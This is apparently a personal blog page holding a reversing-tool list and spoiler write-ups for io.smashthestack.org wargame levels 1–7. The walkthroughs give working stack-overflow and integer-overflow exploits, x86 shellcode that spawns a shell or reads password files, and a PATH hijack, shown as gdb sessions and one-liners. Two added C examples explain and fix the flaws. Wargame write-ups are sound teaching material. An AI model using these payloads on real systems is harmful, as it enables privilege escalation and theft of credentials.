Monday, June 24, 2013

Notes: Reversing VM

Some notes to myself on rebuilding my reversing VM from scratch:

  • VirtualBox
  • Windows 7
  • IDA Pro
  • Hex-Rays
  • Immunity Debugger
  • Wireshark
  • CFF Explorer
  • Process Hacker
  • Resource Hacker
  • apateDNS
  • Dbgview
  • hexedit
  • PEiD
  • strings
  • upx
  • idr - Interactive Delphi Reconstructor
  • pydbg
  • pefile
  • Sandbox that generates memdumps
  • Practical Malware Analysis
  • Grey Hat Python
  • The IDA Pro Book

IO Level 7

Level 7 from io.smashthestack.org:

count is a signed integer, so a negative value can be passed in. With a large enough negative value, the count * sizeof(int) length computed for the memcpy() wraps around, back into positive territory. Here are some debugging printfs to help visualize how many bytes are actually being copied by the memcpy():


level7@io:/tmp/ds7$ ./level07 -1073741815 blah
count: -1073741815 (0xc0000009) 3221225481
count * sizeof(int): 36 (0x00000024) 36
Not today son

Brute-force the offsets a bit to get things to line up:

(gdb) run -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/ds7/level07 -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`
count: -1073741813 (0xc000000b) 3221225483
count * sizeof(int): 44 (0x0000002c) 44

Breakpoint 1, main (argc=3, argv=0xbffffd64) at level07.c:23
23              if(count == 0x574f4c46) {
(gdb) x/x &count
0xbffffcac:     0x42424242

Adjust offsets for production:

(gdb) run -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

Breakpoint 1, 0x08048467 in main ()
(gdb) x/x $ebp - 0xc
0xbffffc9c:     0x574f4c46

level7@io:/tmp/ds7$ /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`
WIN!
sh-4.2$ id
uid=1007(level7) gid=1007(level7) euid=1008(level8) groups=1008(level8),1007(level7),1029(nosu)
sh-4.2$ cat /home/level8/.pass
shhh don't snitch
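As an added example (not code from the writeup or the level), the 32-bit length arithmetic the Level 7 debug prints show, reproduced beside a checked length computation that rejects negative or oversized counts before any multiplication happens; the function names and the 10-int buffer size are assumptions of this example:

```c
/* Added example, not from the writeup or the level: the Level 7 length
 * arithmetic in 32-bit terms, beside a checked replacement. The function
 * names and the 10-int buffer size are assumptions of this example. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* What a 32-bit build computes for the memcpy() length: the negative count
 * is converted to unsigned, multiplied by sizeof(int), and the product is
 * kept modulo 2^32, e.g. 0xc0000009 * 4 = 0x300000024 -> 0x24 (36 bytes). */
uint32_t wrapped_len(int32_t count)
{
    uint32_t elem = (uint32_t)sizeof(int);   /* 4, as in the writeup */
    return (uint32_t)count * elem;           /* unsigned 32-bit wraparound */
}

/* Checked replacement: reject negatives before any conversion, then bound
 * the product by dividing instead of multiplying, so it can never wrap.
 * Returns 1 and stores the byte count in *out only when the copy fits. */
int checked_len(int32_t count, size_t elem, size_t cap, size_t *out)
{
    if (count < 0 || elem == 0)
        return 0;
    if ((size_t)count > cap / elem)          /* count * elem would exceed cap */
        return 0;
    *out = (size_t)count * elem;
    return 1;
}

int main(void)
{
    /* The three count values used in the writeup above. */
    int32_t counts[] = { -1073741815, -1073741813, -1073741808 };
    size_t cap = 10 * sizeof(int);           /* assumed buffer: 10 ints */
    for (size_t i = 0; i < sizeof counts / sizeof counts[0]; i++) {
        size_t n = 0;
        int ok = checked_len(counts[i], sizeof(int), cap, &n);
        printf("count=%d  wrapped length=%u  checked: %s\n",
               (int)counts[i], (unsigned)wrapped_len(counts[i]),
               ok ? "accepted" : "rejected");
    }
    return 0;
}
```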

IO Level 6

Level 6 from io.smashthestack.org:

Input templates:


first: AAAAAAAAAAAAAAAAAAAA (20 + \n)
last: BBBBBBBBBBBBBBCCCCC (19 + \n)

If the input is longer than 20 bytes, the strncpy() in prompt_name() truncates the string and does not slap on a terminating \0.

In prompt_full_name(), after both prompts have been read, first effectively becomes first + last (there is no \0 between them), so the first strcpy() copies 39 bytes into full name, then 1 space, then 19 more bytes from the second strcpy() (enough to overwrite EIP).

Note: the first read()'s buffer needs to be filled completely, else the second read() will pick up where the first left off and muck things up. New input template:

perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x01\x02\x03\x04C\n"' > in

Put the shellcode into the EGG environment variable. The shellcode was very picky (no actual shells allowed):


level6@io:/tmp/dennis6$ cat sc.pl
my $nops = "\x90" x 50;

#dennis@ipa:~/msf3$ ./msfvenom -p linux/x86/exec -f pl -b '\x00' CMD='cat /home/level7/.pass'
#[*] x86/shikata_ga_nai succeeded with size 85 (iteration=1)

my $sc =
"\xdb\xd3\xd9\x74\x24\xf4\xbb\xc6\x34\x4f\xa3\x58\x29\xc9" .
"\xb1\x0f\x31\x58\x19\x83\xe8\xfc\x03\x58\x15\x24\xc1\x25" .
"\xa8\xf0\xb3\xe8\xc8\x68\xe9\x6f\x9c\x8f\x99\x40\xed\x27" .
"\x5a\xf7\x3e\xd5\x33\x69\xc8\xfa\x96\x9d\xdd\xfc\x16\x5e" .
"\x81\x9d\x62\x7e\x6a\x35\xe4\x13\x11\xea\x96\x8e\xaf\x91" .
"\x0a\x66\x7f\x77\xa3\xe9\x0c\xf4\x43\xbd\xa1\x73\xa2\x8c" .
"\xc6";

print $nops.$sc

level6@io:/tmp/dennis6$ export EGG=`perl sc.pl`

Get address of the EGG environment variable:

level6@io:/tmp/dennis6$ cat le.c
#include <stdio.h>
#include <stdlib.h>

/* progname must be the same length as /levels/level06 */

int main()
{
        char *envaddr;

        envaddr = getenv("EGG");
        printf("EGG is at %p\n", envaddr);
        return 0;
}

>>> len("/levels/level06")
15
>>> len("/tmp/dennis6/le")
15

level6@io:/tmp/dennis6$ ./le
EGG is at 0xbffffe97

Adjust the input template with the return address:

level6@io:/tmp/dennis6$ perl -e 'print "AAAAAAAAAAAAAAAAAAAA\n" . "Z" x 4075 . "BBBBBBBBBBBBBB\x97\xfe\xff\xbfC\n"' > exp

level6@io:/tmp/dennis6$ /levels/level06 < exp
Please enter your first name:
Please enter your last name:
Welcome, AAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBB???C BBBBBBBBBBBBBB???C
shhh don't snitch
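As an added example (not code from the writeup or the level), the strncpy() behaviour that Level 6 hinges on: with the full buffer size as the length, a source of 20 or more bytes leaves no terminator, while copying at most n-1 bytes and writing the \0 yourself always does. NAME_LEN and the function names are assumptions of this example.

```c
/* Added example, not from the writeup or the level: why strncpy() with the
 * full buffer size leaves no terminator, and the form that always adds one.
 * NAME_LEN and the function names are assumptions of this example. */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 20   /* assumed size of the level's name buffers */
/* 1 if buf[0..n) holds a '\0', i.e. string functions stop inside the buffer. */
int has_terminator(const char *buf, size_t n)
{
    return memchr(buf, '\0', n) != NULL;
}

/* The pattern the writeup exploits: strncpy() only pads with '\0' when the
 * source is shorter than n. A source of n or more bytes fills every byte,
 * and the destination stops being a C string. */
void copy_name_unterminated(char dst[NAME_LEN], const char *src)
{
    strncpy(dst, src, NAME_LEN);
}

/* Hardened form: copy at most n-1 bytes and always write the terminator. */
void copy_name_terminated(char dst[NAME_LEN], const char *src)
{
    strncpy(dst, src, NAME_LEN - 1);
    dst[NAME_LEN - 1] = '\0';
}

/* Copies src into a fresh buffer with one of the two routines and reports
 * whether the result is still a proper C string. */
int terminated_after_copy(const char *src, int hardened)
{
    char buf[NAME_LEN];
    memset(buf, 'X', sizeof buf);            /* stale bytes, as a real stack may hold */
    if (hardened) copy_name_terminated(buf, src);
    else          copy_name_unterminated(buf, src);
    return has_terminator(buf, NAME_LEN);
}

int main(void)
{
    /* Constructed input in the writeup's style: 20 'A's, leaving no room for '\0'. */
    const char *twenty_as = "AAAAAAAAAAAAAAAAAAAA";
    printf("strncpy(n):   terminated=%d\n", terminated_after_copy(twenty_as, 0));
    printf("strncpy(n-1): terminated=%d\n", terminated_after_copy(twenty_as, 1));
    printf("short input:  terminated=%d\n", terminated_after_copy("Dennis", 0));
    return 0;
}
```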

IO Level 5

Level 5 of io.smashthestack.org:


level5@io:/tmp/dennis5$ cat exp.py 
# aleph one's shellcode from smashing the stack for fun and profit
shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"

nops = "A" * (140 - len(shellcode))

# start of buf, from gdb
ret = "\xe0\xfb\xff\xbf"

print "%s" % nops + shellcode + ret

level5@io:/tmp/dennis5$ /levels/level05 `python exp.py`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?^1?FF  V
                     ? N?1??@??????/bin/sh????
sh-4.1$ id            ?
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1006(level6),1005(level5),1029(nosu)
sh-4.1$ cat /home/level6/.pass
shhh don't snitch

IO Level 4

Level 4 of io.smashthestack.org:

level4@io:~$ cd /tmp/dennis
level4@io:/tmp/dennis$ cat id
#!/bin/sh
cat /home/level5/.pass
level4@io:/tmp/dennis$ export PATH=.:$PATH
level4@io:/tmp/dennis$ /levels/level04
shhh don't snitch

IO Level 3

Level 3 of io.smashthestack.org:

level3@io:/levels$ ./level03 `python -c 'print "A" * 80'`
This is exciting we're going to 0x41414141
Segmentation fault
level3@io:/levels$ ./level03 `python -c 'print "A" * 76 + "\x74\x84\x04\x08"'`
This is exciting we're going to 0x8048474
Win.
sh-4.1$ id
uid=1003(level3) gid=1003(level3) euid=1004(level4) groups=1004(level4),1003(level3),1029(nosu)
sh-4.1$ cat /home/level4/.pass
shhh don't snitch

IO Level 2

Level 2 of io.smashthestack.org:

level2@io:/levels$ ./level02_alt NAN
sh-4.1$ id    
uid=1002(level2) gid=1002(level2) euid=1003(level3) groups=1003(level3),1002(level2),1029(nosu)
sh-4.1$ cat /home/level3/.pass
shhh don't snitch

IO Level 1

Level 1 of io.smashthestack.org:

level1@io:/levels$ strings -el level01
SecretPW
level1@io:/levels$ ./level01 SecretPW
Win!

You will find the ssh password for level2 in /home/level2/.pass

sh-4.1$ cat /home/level2/.pass
shhh don't snitch

Signals #1-4

I'm putting Gera's Signals #1-4 on hold indefinitely. I gave them the ol' college try, but didn't make much progress after multiple attempts.

If anyone has anything on these, please ping me.

Up next, io.smashthestack.org. WARNING: there will be spoilers!

9-5ing

A couple of 9-5 things: